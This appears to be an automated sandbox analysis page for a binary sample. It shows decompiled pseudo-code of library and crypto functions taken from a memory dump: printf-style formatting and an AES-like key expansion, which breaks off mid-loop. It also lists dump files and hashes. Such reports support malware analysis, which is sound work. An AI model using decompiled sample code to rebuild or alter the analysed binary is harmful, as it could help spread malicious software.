                0x003e4610
                0x003e4610
                0x003e4679
                0x00000000
                0x003e4591
                0x003e4591
                0x003e4591
                0x003e4592
                0x003e4598
                0x00000000
                0x00000000
                0x003e459e
                0x003e45a2
                0x003e45a3
                0x003e45a5
                0x00000000
                0x00000000
                0x00000000
                0x003e45a7
                0x00000000
                0x003e4591
                0x003e458f
                0x003e454b
                0x003e454f
                0x00000000
                0x003e454f
                0x003e44f7
                0x003e44fa
                0x003e44fa
                0x003e44fc
                0x00000000
                0x00000000
                0x003e44fe
                0x003e44ff
                0x003e4502
                0x003e4505
                0x00000000
                0x00000000
                0x00000000
                0x003e4507
                0x003e4509
                0x00000000
                0x003e4509
                0x003e44c1
                0x003e44c4
                0x003e44ce
                0x003e44d6
                0x003e44db
                0x003e44de
                0x00000000
                0x003e44de
                0x003e4491
                0x003e4493
                0x00000000
                0x00000000
                0x003e4497
                0x003e449c
                0x003e449e
                0x00000000
                0x00000000
                0x00000000
                0x003e45ed
                0x003e45ed
                0x003e45ed
                0x003e45f9
                0x003e45f9
                0x003e4600
                0x003e4604
                0x003e4614
                0x003e4614
                0x003e461f
                0x003e4624
                0x003e4625
                0x003e4628
                0x003e462d
                0x003e4637
                0x003e463f
                0x003e4640
                0x003e4647
                0x003e4648
                0x003e4651
                0x003e4659
                0x003e465a
                0x003e465f
                0x003e4667
                0x003e466f
                0x003e4672
                0x003e4677
                0x00000000
                0x003e4677
                0x003e4608
                0x003e460e
                0x00000000
                0x00000000
                0x00000000
                0x003e460e
                0x003e43f2
                0x003e43f4
                0x00000000
                0x00000000
                0x003e43f6
                0x003e43fb
                0x003e43fd
                0x00000000
                0x00000000
                0x00000000
                0x003e43fd
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                • Instruction ID: 5237d1f8f0f7ffc53b81ae66aca367bad11803411a04ac17ea096ba31ce3b36b
                • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                • Instruction Fuzzy Hash: C6816CB13043D64BDF27DE6AD8C0BBD37D4AB99304F000B2DE9C68B6C2DA7489858752
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 84%
                			E003F51C9(void* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				void* _t103;
				signed int _t109;
				unsigned int _t111;
				signed char _t113;
				unsigned int _t121;
				void* _t122;
				signed int _t123;
				short _t124;
				void* _t127;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t122 = __edi;
				_t52 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t52 ^ _t130;
				_t129 = __ecx;
				_t101 = 0;
				_t121 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t103 = 0x58;
				_t133 = _t54 - 0x64;
				if(_t133 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E003F5BFB(_t129);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
									L71:
									_t57 = 1;
									L72:
									return E003EFBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
								}
								_t121 =  *(_t129 + 0x20);
								_push(_t122);
								_v16 = _t101;
								_t60 = _t121 >> 4;
								_v12 = _t101;
								_t123 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
									__eflags = _t109 - 0x78;
									if(_t109 == 0x78) {
										L48:
										_t62 = _t121 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t109 - 0x61;
											if(_t109 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t124 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
													__eflags = _t109 - _t65;
													if(_t109 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t101 = _t101 + 2;
														__eflags = _t101;
														L62:
														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
														__eflags = _t121 & 0x0000000c;
														if((_t121 & 0x0000000c) == 0) {
															E003F4490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
															_t131 = _t131 + 0x10;
														}
														E003F5F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
														_t111 =  *(_t129 + 0x20);
														_t101 = _t129 + 0x18;
														_t75 = _t111 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t113 = _t111 >> 2;
															__eflags = _t113 & 0x00000001;
															if((_t113 & 0x00000001) == 0) {
																E003F4490(_t129 + 0x448, 0x30, _t127, _t101);
																_t131 = _t131 + 0x10;
															}
														}
														E003F5DF8(_t129, 0);
														__eflags =  *_t101;
														if( *_t101 >= 0) {
															_t78 =  *(_t129 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E003F4490(_t129 + 0x448, 0x20, _t127, _t101);
															}
														}
														_pop(_t122);
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t109 - _t86;
													if(_t109 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t128 = 0x41;
											__eflags = _t109 - _t128;
											if(_t109 == _t128) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t109 - _t88;
									if(_t109 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t121 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t121;
									if((1 & _t121) == 0) {
										_t92 = _t121 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t123;
										L45:
										_t101 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t101);
							_push(0xa);
							L29:
							_t56 = E003F5993(_t129, _t122, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E003F5B70(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E003F56F9(_t101, _t129);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t129 + 0x20;
						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E003F5ADD(__ecx, _t121);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E003F5B51(__ecx);
					goto L10;
				}
				if(_t133 == 0) {
					goto L27;
				}
				_t134 = _t54 - _t103;
				if(_t134 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E003F553C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E003F58FB(_t129, __eflags, _t101);
					goto L10;
				}
				if(_t134 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t121) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































                0x003f51c9
                0x003f51d1
                0x003f51d8
                0x003f51dd
                0x003f51df
                0x003f51e3
                0x003f51e6
                0x003f51ea
                0x003f51eb
                0x003f51ee
                0x003f525b
                0x003f525e
                0x003f52ad
                0x003f52ad
                0x003f52b0
                0x003f521c
                0x003f521e
                0x003f5223
                0x003f5225
                0x003f52cb
                0x003f52ce
                0x003f5414
                0x003f5414
                0x003f5416
                0x003f5425
                0x003f5425
                0x003f52d4
                0x003f52d9
                0x003f52dc
                0x003f52df
                0x003f52e3
                0x003f52e9
                0x003f52ea
                0x003f52ec
                0x003f5316
                0x003f5316
                0x003f531a
                0x003f531d
                0x003f5327
                0x003f5329
                0x003f532c
                0x003f532e
                0x003f5334
                0x003f5334
                0x003f5336
                0x003f5336
                0x003f5339
                0x003f5347
                0x003f5347
                0x003f5349
                0x003f534b
                0x003f534c
                0x003f534e
                0x003f5354
                0x003f5356
                0x003f5357
                0x003f535c
                0x003f535f
                0x003f536d
                0x003f536d
                0x003f536f
                0x003f536f
                0x003f537a
                0x003f537c
                0x003f5381
                0x003f5381
                0x003f5384
                0x003f538a
                0x003f538c
                0x003f538f
                0x003f539f
                0x003f53a4
                0x003f53a4
                0x003f53b9
                0x003f53be
                0x003f53c1
                0x003f53c6
                0x003f53c9
                0x003f53cb
                0x003f53cd
                0x003f53d0
                0x003f53d3
                0x003f53e0
                0x003f53e5
                0x003f53e5
                0x003f53d3
                0x003f53ec
                0x003f53f1
                0x003f53f4
                0x003f53f9
                0x003f53fc
                0x003f53fe
                0x003f540b
                0x003f5410
                0x003f53fe
                0x003f5413
                0x00000000
                0x003f5413
                0x003f5363
                0x003f5364
                0x003f5367
                0x00000000
                0x00000000
                0x003f5369
                0x00000000
                0x003f5369
                0x003f5350
                0x003f5352
                0x00000000
                0x00000000
                0x00000000
                0x003f5352
                0x003f533d
                0x003f533e
                0x003f5341
                0x00000000
                0x00000000
                0x003f5343
                0x00000000
                0x003f5343
                0x00000000
                0x003f5330
                0x003f5321
                0x003f5322
                0x003f5325
                0x00000000
                0x00000000
                0x00000000
                0x003f5325
                0x003f52f0
                0x003f52f3
                0x003f52f5
                0x003f5300
                0x003f5302
                0x003f530a
                0x003f530c
                0x003f530e
                0x00000000
                0x00000000
                0x003f5310
                0x003f5314
                0x003f5314
                0x00000000
                0x003f5314
                0x003f5304
                0x003f52f9
                0x003f52f9
                0x003f52fa
                0x00000000
                0x003f52fa
                0x003f52f7
                0x00000000
                0x003f52f7
                0x003f522b
                0x003f522b
                0x00000000
                0x003f522b
                0x003f52b7
                0x003f52b7
                0x003f52ba
                0x003f528c
                0x003f528c
                0x003f528d
                0x003f528f
                0x003f5291
                0x00000000
                0x003f5291
                0x003f52bc
                0x003f52bf
                0x00000000
                0x00000000
                0x003f52c5
                0x003f5234
                0x003f5234
                0x00000000
                0x003f5234
                0x003f5260
                0x003f52a3
                0x00000000
                0x003f52a3
                0x003f5262
                0x003f5265
                0x003f5298
                0x003f529a
                0x00000000
                0x003f529a
                0x003f5267
                0x003f526a
                0x003f5288
                0x003f5288
                0x003f5288
                0x003f5288
                0x00000000
                0x003f5288
                0x003f526c
                0x003f526f
                0x003f5281
                0x00000000
                0x003f5281
                0x003f5271
                0x003f5274
                0x00000000
                0x00000000
                0x003f5278
                0x00000000
                0x003f5278
                0x003f51f0
                0x00000000
                0x00000000
                0x003f51f6
                0x003f51f8
                0x003f5238
                0x003f5238
                0x003f523b
                0x003f5254
                0x00000000
                0x003f5254
                0x003f523d
                0x003f523d
                0x003f5240
                0x00000000
                0x00000000
                0x003f5243
                0x003f5246
                0x00000000
                0x00000000
                0x003f5248
                0x003f524b
                0x00000000
                0x003f524b
                0x003f51fa
                0x003f5232
                0x00000000
                0x003f5232
                0x003f51fe
                0x00000000
                0x00000000
                0x003f5207
                0x00000000
                0x00000000
                0x003f520c
                0x00000000
                0x00000000
                0x003f5211
                0x00000000
                0x00000000
                0x003f521a
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 769ac4f03ebc4a92b07d3c7295fee69e14a5c031a01b4390f84e333cf0ffa69d
                • Instruction ID: 62d301a36dbaf3cecf0bde807b6a4d636940972e6de33e8c9680176ca0528f6f
                • Opcode Fuzzy Hash: 769ac4f03ebc4a92b07d3c7295fee69e14a5c031a01b4390f84e333cf0ffa69d
                • Instruction Fuzzy Hash: DC618B35A00F0C77DA3B996C5895BBE2398EB12340F160F2BE783DF682D691DD428251
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 88%
                			E003F4F9A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E003F5B88(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E003F4464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E003F5E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E003F4464(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E003F5D51(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E003F4464(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E003F5993(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E003F5B70(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E003F559F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E003F5ADD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E003F5B51(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E003F54D9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E003F586B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                0x003f4f9f
                0x003f4fa2
                0x003f4fa6
                0x003f4fa9
                0x003f4fad
                0x003f4fb0
                0x003f501e
                0x003f5021
                0x003f5070
                0x003f5070
                0x003f5073
                0x003f4fe0
                0x003f4fe2
                0x003f4fe7
                0x003f4fe9
                0x003f508e
                0x003f5092
                0x003f509b
                0x003f50a0
                0x003f50a1
                0x003f50a5
                0x003f50a7
                0x003f50ac
                0x003f50af
                0x003f50b1
                0x003f50da
                0x003f50da
                0x003f50dd
                0x003f50e0
                0x003f50e7
                0x003f50e9
                0x003f50ec
                0x003f50ee
                0x003f50f2
                0x003f50f2
                0x003f50f5
                0x003f5100
                0x003f5100
                0x003f5102
                0x003f5102
                0x003f5104
                0x003f510a
                0x003f510a
                0x003f510f
                0x003f5112
                0x003f511d
                0x003f511d
                0x003f511f
                0x003f511f
                0x003f512a
                0x003f512e
                0x003f512e
                0x003f5131
                0x003f5137
                0x003f5139
                0x003f513c
                0x003f514c
                0x003f5151
                0x003f5151
                0x003f5166
                0x003f516b
                0x003f516e
                0x003f5173
                0x003f5176
                0x003f5178
                0x003f517a
                0x003f517d
                0x003f5180
                0x003f518d
                0x003f5192
                0x003f5192
                0x003f5180
                0x003f5199
                0x003f519e
                0x003f51a1
                0x003f51a6
                0x003f51a9
                0x003f51ab
                0x003f51b8
                0x003f51bd
                0x003f51ab
                0x003f51c0
                0x003f51c3
                0x003f51c8
                0x003f51c8
                0x003f5114
                0x003f5117
                0x00000000
                0x00000000
                0x003f5119
                0x00000000
                0x003f5119
                0x003f5106
                0x003f5108
                0x00000000
                0x00000000
                0x00000000
                0x003f5108
                0x003f50f7
                0x003f50fa
                0x00000000
                0x00000000
                0x003f50fc
                0x00000000
                0x003f50fc
                0x003f50f0
                0x003f50f0
                0x003f50f0
                0x00000000
                0x003f50f0
                0x003f50e2
                0x003f50e5
                0x00000000
                0x00000000
                0x00000000
                0x003f50e5
                0x003f50b5
                0x003f50b8
                0x003f50ba
                0x003f50c2
                0x003f50c4
                0x003f50ce
                0x003f50d0
                0x003f50d2
                0x00000000
                0x00000000
                0x003f50d4
                0x003f50d8
                0x003f50d8
                0x00000000
                0x003f50d8
                0x003f50c6
                0x00000000
                0x003f50c6
                0x003f50bc
                0x00000000
                0x003f50bc
                0x003f5094
                0x00000000
                0x003f5094
                0x003f4fef
                0x003f4fef
                0x00000000
                0x003f4fef
                0x003f507a
                0x003f507a
                0x003f507d
                0x003f504f
                0x003f504f
                0x003f5050
                0x003f5052
                0x003f5054
                0x00000000
                0x003f5054
                0x003f507f
                0x003f5082
                0x00000000
                0x00000000
                0x003f5088
                0x003f4ff7
                0x003f4ff7
                0x00000000
                0x003f4ff7
                0x003f5023
                0x003f5066
                0x00000000
                0x003f5066
                0x003f5025
                0x003f5028
                0x003f505b
                0x003f505d
                0x00000000
                0x003f505d
                0x003f502a
                0x003f502d
                0x003f504b
                0x003f504b
                0x003f504b
                0x003f504b
                0x00000000
                0x003f504b
                0x003f502f
                0x003f5032
                0x003f5044
                0x00000000
                0x003f5044
                0x003f5034
                0x003f5037
                0x00000000
                0x00000000
                0x003f503b
                0x00000000
                0x003f503b
                0x003f4fb2
                0x00000000
                0x00000000
                0x003f4fb8
                0x003f4fbb
                0x003f4ffb
                0x003f4ffb
                0x003f4ffe
                0x003f5017
                0x00000000
                0x003f5017
                0x003f5000
                0x003f5000
                0x003f5003
                0x00000000
                0x00000000
                0x003f5006
                0x003f5009
                0x00000000
                0x00000000
                0x003f500b
                0x003f500e
                0x00000000
                0x003f500e
                0x003f4fbd
                0x003f4ff6
                0x00000000
                0x003f4ff6
                0x003f4fc2
                0x00000000
                0x00000000
                0x003f4fcb
                0x00000000
                0x00000000
                0x003f4fd0
                0x00000000
                0x00000000
                0x003f4fd5
                0x00000000
                0x00000000
                0x003f4fde
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                • Instruction ID: 867df1a452cec65adb00eaf1c28b606a4d5124da2ea994291e746606586a4d65
                • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                • Instruction Fuzzy Hash: 5C516A61200F4E57DF3B4928895AFBF67C99B02300F190919EB87CB683DA19ED45C3D5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DEFE2 Relevance: .2, Instructions: 161COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 97%
                			E003DEFE2(intOrPtr __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _t94;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed char _t120;
				signed int* _t121;
				signed int* _t122;
				signed int _t123;
				signed int* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				void* _t130;
				signed int _t131;
				void* _t132;
				signed int _t134;
				signed int* _t139;
				signed int* _t142;
				void* _t145;
				void* _t167;

				_t134 = _a4 - 6;
				_v48 = __ecx;
				_v40 = _t134;
				_t94 = E003F0320( &_v32, _a4, 0x20);
				_t145 =  &_v48 + 0xc;
				_t117 = 0;
				_t126 = 0;
				_t127 = 0;
				if(_t134 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t128 = 0x40e198;
						do {
							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0x40e098);
							_v32 = _t120;
							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0x40e098);
							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0x40e098);
							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0x40e098);
							_t94 =  *_t128 ^ _t120;
							_v32 = _t94;
							_v36 =  &(_t128[0]);
							if(_t134 == 8) {
								_t121 =  &_v28;
								_v44 = 3;
								do {
									_t130 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t55 =  &_v44;
									 *_t55 = _v44 - 1;
								} while ( *_t55 != 0);
								_t122 =  &_v12;
								_v44 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x40e098);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x40e098);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x40e098);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x40e098);
								do {
									_t131 = 4;
									do {
										_t94 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t94;
										_t122 =  &(_t122[0]);
